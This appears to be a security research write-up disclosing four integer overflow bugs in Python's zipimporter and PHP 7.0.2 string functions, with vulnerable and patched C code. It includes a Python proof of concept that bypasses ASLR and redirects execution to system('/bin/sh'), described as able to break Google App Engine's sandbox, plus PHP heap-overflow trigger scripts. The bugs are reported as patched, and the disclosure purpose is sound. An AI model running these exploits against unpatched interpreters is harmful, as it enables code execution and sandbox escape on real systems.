Introduction

Security vulnerabilities in language interpreters are considered more critical than bugs in software in general because they could break the trust for trusted computing base (TCB) as Ken Thompson pointed on his famous turing award lecture in 1984 [1]. For instance, these vulnerabilities break the security guarantee provided by security analysis tools or code auditing while the most of such analyses grounded on the trust for language interpreters. Instead of starting the security analysis from low-level parts of a machine, the analysis sets the interpreter as a root of trust, then performs static and dynamic analyses over the language abstraction to test software against bugs. Although such analyses can catch bugs in the code level, they cannot detect vulnerabilities underlying the interpreter. These hideous vulnerabilities, if any of these is exploited, break the trust guaranteed by the analyses performed over the code.

Another example remarkably affected by such bugs is the language interpreter sandbox in cloud providers. Cloud providers such as Google App Engine modified the language interpreter to create sandbox by only providing restricted environment (e.g., that cannot execute shell command or cannot interact with OS-related functions) to the guest of the cloud. The main purpose of having such sandboxes is to isolate the guest and limit the resource while not running the code in the virtual machines, which is costly in performance. Nonetheless, since the restrictions of the sandbox is based on trusted language interpreters, the isolation cannot be guaranteed if a vulnerability in the interpreter is exploited by an attacker.

In this article, we demostrate four integer overflow vulnerabilities, which are found by our recent research work [2], in Python and PHP language interpreters that can be exploited for control-flow hijacking. These vulnerabilities undermine the trust of language interpreters, thus break security guarantees on language runtime sandbox. We note that all these vulnerabilities disclosed here have been patched already in the upstream release version of Python and PHP.

Python zipimporter heap overflow(CVE-2016-5636)

zipimport

$ python
>>> import sys
>>> sys.path
[..., '/usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg', ...]
$ file /usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg
/usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg: Zip archive data, at least v2.0 to extract

sys.path, search paths for modules, contains not only directories, but also ZIP files. zipimport module provides the way to import Python modules from ZIP-format archives.

Vulnerability

// zipimporter.c
bytes_size = compress == 0 ? data_size : data_size + 1;
if (bytes_size == 0)
    bytes_size++;
raw_data = PyBytes_FromStringAndSize((char *)NULL, bytes_size);

The vulnerability exists in ZIP file decoder of zipimporter module. data_size, extracted from ZIP file, is not properly validated. If data_size is 0xffffffff(-1) and compress is non-zero, then bytes_size, buffer size for storing file data, becomes one. Later, Python reads a file to this small buffer and heap overflow is occurred.

Bypass ASLR

>>> hex(id('a'))
'0x7f6c2c677710'

To achieve arbitrary code execution, we need to bypass ASLR. Fortunately, Python uses a memory address as an id of an objet. By using built-in id, we can bypass ASLR.

Proof of Concept

#!/usr/bin/env python2
import os
import zipimport
import zipfile
import struct

FILE = 'payload'
ZIP = 'import.zip'
DIR = 'sh'

if not os.path.exists(DIR):
    os.mkdir(DIR)

addr = id("A")
libc_base = addr
system_addr = libc_base + 0x46640
print("LIBC_BASE : %x" % libc_base)

bin_sh = os.path.join(DIR, struct.pack('<Q',  libc_base + 0x7b1998).replace("\x00", ""))
with open(bin_sh, 'w') as f:
    f.write("/bin/sh")
os.chmod(bin_sh, 0777)
os.putenv("PATH", os.getenv("PATH") + ":" + DIR)

some_string_obj = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"
some_string_obj += "QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZaaaabbbbccccddddeeeeffff"
some_string_obj += "gggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvv"
some_string_obj += "wwwwxxxxyyyyzzzz"
some_string_obj += "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"
some_string_obj += "QQQQRRRRSSSSTTTTUUUU"
print("%x" % id(some_string_obj))

# func addr here
some_string_obj += struct.pack('<Q', system_addr)
a = some_string_obj
addr = id(a)
addrs = []
for i in xrange(8):
    addrs.append(addr % 0x100)
    addr /= 0x100
addrs_2 = map(lambda x:chr(x), addrs)
print(addrs_2)

print("%x" % id(some_string_obj))
# generate input
with open(FILE, 'wb') as f:
    payload = ("aaaa"+("".join(addrs_2)) * 128)
    f.write(payload)

zf = zipfile.PyZipFile(ZIP, mode='w')
zf.write(FILE)
zf.close()

importer = zipimport.zipimporter(ZIP)
f = list(importer._files[FILE])
f[1] = 1 # compress
f[2] = -1 # file size
importer._files[FILE] = tuple(f)
importer.get_data(FILE)

Google App Engine

Since zipimport is an essential module for Python, it is in the whitelist of Google App Engine's Python sandbox. Consequently, the attacker can exploit this vulnerability to break the sandbox. We reported this issue to Google upon its discovery.

Integer Overflow in PHP

In PHP v7.0.2, strings are generally allocated by zend_string_alloc() function.

// zend/zend_string.h
static zend_always_inline zend_string *zend_string_alloc(size_t len, int persistent)
{
    zend_string *ret = (zend_string *)pemalloc(ZEND_MM_ALIGNED_SIZE(_ZSTR_STRUCT_SIZE(len)), persistent);

    GC_REFCOUNT(ret) = 1;
    //..

    ZSTR_LEN(ret) = len;
    return ret;
}

The function is a wrapper of pemalloc. The function internally invokes pemalloc(size) to allocate the memory, with size value with respect to len variable. The function itself seems to not to have any bug, however, using the function with arithmetic expression as the length argument can create a vulnerability.

Vulnerability example in php_implode

// ext/standard/string.c
PHPAPI void php_implode(const zend_string *delim, zval *arr, zval *return_value)
{
    // ...
    str = zend_string_alloc(len + (numelems - 1) * ZSTR_LEN(delim), 0);
    // ...
}

A vulnerable example is in the php_implode function. The function invokes zend_string_alloc with the following arithmetic expression as the length argument: len + (numelems - 1) * ZSTR_LEN(delim)

An integer overflow can arise in the expression if the values are carefully manimulated. For instance, in case when the size of string delim is 65,536, number of elements are 65,536, and the length of the string len is 65,536, then the size value will be zero (65536 + 65535 * 65536) = 4294967296 = 0

The following code shows the proof-of-concept (PoC) that exploits the vulnerability.

<?php
    $arr = [];
    for($i=0;$i<65536; ++$i) {
        $arr[$i]= "aa";
    }
    $text1 = str_repeat("ABCD", 16384);
    // Changing ABCD into other values will alter %eax and %ecx.
    $str = implode($text1, $arr);
?>

Exploiting the vulnerability requires the size of strings for the arguments to be matched to overflow, as mentioned above. First, we build the string $text1 to be 65,536 sized string (ABCD is repeated 16,384 times).

We searched for similar cases (i.e., use of zend_string_alloc with multiplication expression) in ext/standard/string.c file, we found three of such cases, and successfully create control-flow hijacking exploits for all cases.

php_wordwrap()

// ext/standard/string.c
PHP_FUNCTION(wordwrap)
{
    // ...

    // allocate string into newtext variable
    if (linelength > 0) {
        chk = (size_t)(ZSTR_LEN(text)/linelength + 1);
        newtext = zend_string_alloc(chk * breakchar_len + ZSTR_LEN(text), 0);
        alloced = ZSTR_LEN(text) + chk * breakchar_len + 1;
    } else {
        chk = ZSTR_LEN(text);
        alloced = ZSTR_LEN(text) * (breakchar_len + 1) + 1;
        newtext = zend_string_alloc(ZSTR_LEN(text) * (breakchar_len + 1), 0);
    }

    // ...

    // do multiple memcpy()...
    if(...) {

        memcpy(ZSTR_VAL(newtext) + newtextlen, ZSTR_VAL(text) + laststart, current - laststart + breakchar_len);

        memcpy(ZSTR_VAL(newtext) + newtextlen, ZSTR_VAL(text) + laststart, current - laststart);

        memcpy(ZSTR_VAL(newtext) + newtextlen, breakchar, breakchar_len);

        memcpy(ZSTR_VAL(newtext) + newtextlen, ZSTR_VAL(text) + laststart, current - laststart);

    }
}

In the code, wordwrap() allocates memory for new string by calling zend_string_alloc, with size argument as either of chk * breakchar_len + ZSTR_LEN(text) or ZSTR_LEN(text) * (breakchar_len + 1).

The expression for the size argument can cause a condition of integer overflow. In the second expression (ZSTR_LEN(text) * (breakchar_len + 1)), if the attacker forges the argument as 65,536 (2^16) character string for text, and 65,535 (2^16 - 1) character string as breakchar, then the resulting value will be (65,536) * (65,535 + 1) = 4294967296 = 0.

In such a case, zend_string_alloc will allocate a zero sized buffer (actually, a little bigger than zero because it is aligned by Zend object size), and then subsequnt memcpy will overwrite the heap buffer.

Proof-of-Concept code for triggering the vulnerability is in the following.

<?php
    $text1 = str_repeat("A", 65536);
    $text2 = str_repeat("B", 65536 - 1);
    $newtext = wordwrap($text1, -1, $text2);
?>

By configuring the length of string arguments as 65,536 and 65,535 respectively, the subsequent memcpy inside wordwrap function will overflow the heap objects.

php_str_to_str_ex()

// ext/standard/string.c
static zend_string *php_str_to_str_ex(zend_string *haystack,
    char *needle, size_t needle_len, char *str, size_t str_len, zend_long *replace_count)
{
    //...
    // count is the value that how many times needle appears in the haystack
    new_str = zend_string_alloc(count * (str_len - needle_len) + ZSTR_LEN(haystack), 0);

    //...

    e = s = ZSTR_VAL(new_str);
    end = ZSTR_VAL(haystack) + ZSTR_LEN(haystack);
    for (p = ZSTR_VAL(haystack); (r = (char*)php_memnstr(p, needle, needle_len, end)); p = r + needle_len) {
        memcpy(e, p, r - p);
        e += r - p;
        memcpy(e, str, str_len);
        e += str_len;
        (*replace_count)++;
    }

    if (p < end) {
        memcpy(e, p, end - p);
        e += end - p;
    }

    //...
}

The variable new_str is allocated with zend_string_alloc, with the multiplicative expression: count * (str_len - needle_len) + ZSTR_LEN(haystack). If the value is overflowed, thus allocates smaller size than the expected one, the following memcpy in the for loop causes heap overflow.

The PoC code for exploiting the bug is in the following.

<?php
    $a = str_repeat('A', 65536);
    $b = str_repeat('ABCD', 32768);
    // Changing 'ABCD' into other value alters %eip to arbitrary value.
    $c = array('AA'=> $b);
    strtr($a , $c);
?>

The haystack becomes a string with the length of 65,536, the needle is 'AA', so the count is 32,768 ('A'*65,536 can be splitted into 32,768 of 'AA's), and str_len is 131,072 ('ABCD' * 32768 = 131071). Therefore, the resulting expression in the zend_string_alloc is 32768 * (131072 - 2) + 65536 = 4294967296 = 0. Since the string object is allocated as size zero, running memcpy over the object in the for-loop will trigger heap overflow.

A Patch: zend_string_safe_alloc()

We reported those three vulnerability to PHP, and all of the bugs are patched in PHP v7.0.4. The patches were very simple, just changing zend_string_alloc to zend_string_safe_alloc. Let's take a look how this can prevent the integer overflow bugs.

//zend_string.h
static zend_always_inline zend_string *zend_string_safe_alloc(size_t n, size_t m, size_t l, int persistent)
{
    // calls _safe_malloc
    zend_string *ret = (zend_string *)safe_pemalloc(n, m, ZEND_MM_ALIGNED_SIZE(_ZSTR_STRUCT_SIZE(l)), persistent);

    GC_REFCOUNT(ret) = 1;

    //...

    ZSTR_LEN(ret) = (n * m) + l;
    return ret;
}

// zend_alloc.c
// _safe_malloc calls zend_safe_address to check if n*m overflows.
ZEND_API void* ZEND_FASTCALL _safe_malloc(size_t nmemb, size_t size, size_t offset)
{
    // calls safe_address
    return pemalloc(safe_address(nmemb, size, offset), 1);
}

static zend_always_inline size_t safe_address(size_t nmemb, size_t size, size_t offset)
{
    int overflow;
    size_t ret = zend_safe_address(nmemb, size, offset, &overflow);

    if (UNEXPECTED(overflow)) {
        zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", nmemb, size, offset);
        return 0;
    }
    return ret;
}

// zend_multiply.h
static zend_always_inline size_t zend_safe_address(size_t nmemb, size_t size, size_t offset, int *overflow)
{
    size_t res = nmemb;
    size_t m_overflow = 0;

    __asm__ ("mull %3\n\taddl %4,%0\n\tadcl $0,%1"
            : "=&a"(res), "=&d" (m_overflow)
            : "%0"(res),
            "rm"(size),
            "rm"(offset));

    if (UNEXPECTED(m_overflow)) {
        *overflow = 1;
        return 0;
    }
    *overflow = 0;
    return res;
}

Contrary to zend_string_alloc that gets multiplicative expression as the argument, zend_string_safe_alloc gets the factors of the size, and internally apply the multiplication to calculate the size. In particular, the function zend_string_safe_alloc calls _safe_malloc, and inside of that, the function calls safe_address, which will finally call zend_safe_address. In the function zend_safe_address, the assembly code placed in the middle actually check if the multiplication of the factor generates integer overflow. If overflow arise, the allocation will fail with error message (at the code of if (UNEXPECTED(overflow)) in safe_address()). Therefore, these integer overflow vulnerabilities no longer exist in the latest version of PHP.

[1] Thompson, K. (1984). Reflections on trusting trust. Communications of the ACM, 27(8), 761-763.

[2] Yun, Insu, et al. (2016). APISAN: Sanitizing API Usages through Semantic Cross-checking, In Proceedings of the 25th USENIX Security Symposium (Security), Austin, TX.